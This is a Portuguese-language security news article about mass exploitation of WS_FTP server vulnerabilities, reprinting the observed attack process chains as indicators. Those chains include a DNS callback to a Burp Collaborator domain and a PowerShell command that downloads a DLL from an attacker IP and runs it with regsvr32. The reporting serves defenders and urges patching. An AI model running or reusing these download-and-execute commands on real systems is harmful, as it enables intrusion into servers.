Notícias de dispositivos móveis, gadgets, aplicativos Android

Exploração de falha crítica do servidor WS_FTP detectada na natureza

Conforme relatado anteriormente, o WS_FTP de propriedade da Progress foi descoberto com múltiplas vulnerabilidades associadas a cross-site scripting (XSS), injeção de SQL, falsificação de solicitação entre sites, enumeração de usuários não autenticados e algumas outras.

A Progress alertou seus usuários sobre as vulnerabilidades do WS_FTP e lançou um comunicado de segurança mencionando a versão corrigida do servidor WS_FTP. Além disso, eles também solicitaram que seus usuários atualizassem para a versão mais recente.

Vulnerabilidades exploradas na natureza

De acordo com os relatórios compartilhados com o Cyber ​​​​Security News, descobriu-se que essas vulnerabilidades eram exploradas por agentes de ameaças em liberdade. Ao investigar mais a fundo, descobriu-se que a cadeia de execução da exploração era a mesma em todas as instâncias observadas.

Documento

Também foi mencionado que isto poderia significar que houve uma exploração em massa dos servidores WS_FTP vulneráveis. Os registros coletados também consistiam em um domínio específico do conjunto burp em todos os incidentes registrados, o que significa que um único ator de ameaça está fazendo a exploração em massa.

No entanto, toda a cadeia de execução de comandos foi listada abaixo.

Processo do bisavô:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Processo dos avós:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Arquivos ASP.NET temporários\aht\e514712b\a2ab2de1\ryvjavth.cmdline

Processo pai:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET\Framework\v4.0.30319\Arquivos ASP.NET temporários\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Processo filho:

C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0c70noboyvgt357r5gwmnady2.oastify.com

De acordo com os relatórios, a cadeia de Ataque teve as execuções de comando abaixo.

Processo do bisavô:

C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Processo dos avós:

Nós recomendamos:  Vulnerabilidade crítica de dia zero no Desktop Window Manager (DWM) permite que invasores aumentem o privilégio
C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Processo pai:

powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Processo filho:

C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll

Além disso, um relatório completo foi publicado pela Rapid7, que fornece informações detalhadas sobre os incidentes registrados, mitigações e outras informações.

“Divulgamos essas vulnerabilidades de forma responsável em conjunto com os pesquisadores da Assetnote e lançamos uma correção para cada uma. Atualmente, não vimos nenhuma indicação de que essas vulnerabilidades tenham sido exploradas antes de lançarmos o patch. A Progress incentiva nossos clientes a atualizar para a versão corrigida do nosso software o mais rápido possível. A segurança é de extrema importância para nós, e aproveitar as melhores práticas de desenvolvimento para minimizar as vulnerabilidades do produto é parte integrante do nosso programa de segurança”, Declaração do porta-voz da Progress.

Table of Contents